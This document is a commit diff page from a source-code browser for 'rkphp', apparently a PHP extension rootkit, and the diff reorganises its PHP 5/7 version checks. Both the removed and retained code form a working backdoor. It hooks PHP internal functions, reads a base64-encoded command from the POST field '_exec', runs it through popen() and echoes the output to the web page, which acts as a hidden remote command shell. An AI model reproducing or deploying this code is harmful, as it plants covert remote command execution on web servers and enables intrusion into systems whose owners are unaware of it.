Browse Source

Default

master
Root 5 years ago
parent
commit
90696aee1a
  1. 56
      rkphp/src/php_funcs.c

56
rkphp/src/php_funcs.c

@ -20,10 +20,11 @@ static int rkphp_hook( @@ -20,10 +20,11 @@ static int rkphp_hook(
}
#if PHP_MAJOR_VERSION < 7
if(zend_hash_find_ptr(CG(function_table),
method_name, strlen(method_name)) == SUCCESS)
#else
if((function = zend_hash_str_find_ptr(CG(function_table),
method_name, strlen(method_name))) != NULL)
#else
if(zend_hash_find_ptr(CG(function_table), method_name, strlen(method_name)) == SUCCESS)
#endif
{
*original = function->internal_function.handler;
@ -173,49 +174,23 @@ PHP_RINIT_FUNCTION(rkphp) @@ -173,49 +174,23 @@ PHP_RINIT_FUNCTION(rkphp)
zval *arr;
#if PHP_MAJOR_VERSION < 7
if(zend_hash_find(&EG(symbol_table), "_POST", sizeof("_POST") - 1, &arr) == SUCCESS)
{
zval *val;
HashTable *ht = Z_ARRVAL_P(arr);
if(zend_hash_find(ht, "_exec", sizeof("_exec") - 1) == SUCCESS)
{
FILE *fp;
char output[2048], decoded[1024], *encoded;
encoded = Z_STRVAL_P(val);
if(base64_decode(encoded, decoded, strlen(encoded)) == 0)
{
RKPHP_PRINTF("[!] Not a valid base64 string!\n");
return SUCCESS;
}
if((fp = popen(decoded, "r")) == NULL)
{
RKPHP_PRINTF("Unable to execute cmd!\n");
return SUCCESS;
}
php_printf("<pre>\n");
while(fgets(output, sizeof(output) - 1, fp) != NULL)
{
php_printf("%s", output);
}
php_printf("</pre>\n");
pclose(fp);
}
}
if(zend_hash_find(&EG(symbol_table),
"_POST", sizeof("_POST") - 1, &arr) == SUCCESS)
#else
if((arr = zend_hash_str_find(&EG(symbol_table), "_POST", sizeof("_POST") - 1)) != NULL)
if((arr = zend_hash_str_find(&EG(symbol_table),
"_POST", sizeof("_POST") - 1)) != NULL)
#endif
{
zval *val;
HashTable *ht = Z_ARRVAL_P(arr);
if((val = zend_hash_str_find(ht, "_exec", sizeof("_exec") - 1)) != NULL)
#if PHP_MAJOR_VERSION < 7
if(zend_hash_find(ht,
"_exec", sizeof("_exec") - 1, &val) == SUCCESS)
#else
if((val = zend_hash_str_find(ht,
"_exec", sizeof("_exec") - 1)) != NULL)
#endif
{
FILE *fp;
char output[2048], decoded[1024], *encoded;
@ -246,7 +221,6 @@ PHP_RINIT_FUNCTION(rkphp) @@ -246,7 +221,6 @@ PHP_RINIT_FUNCTION(rkphp)
pclose(fp);
}
}
#endif
return SUCCESS;
}

Loading…
Cancel
Save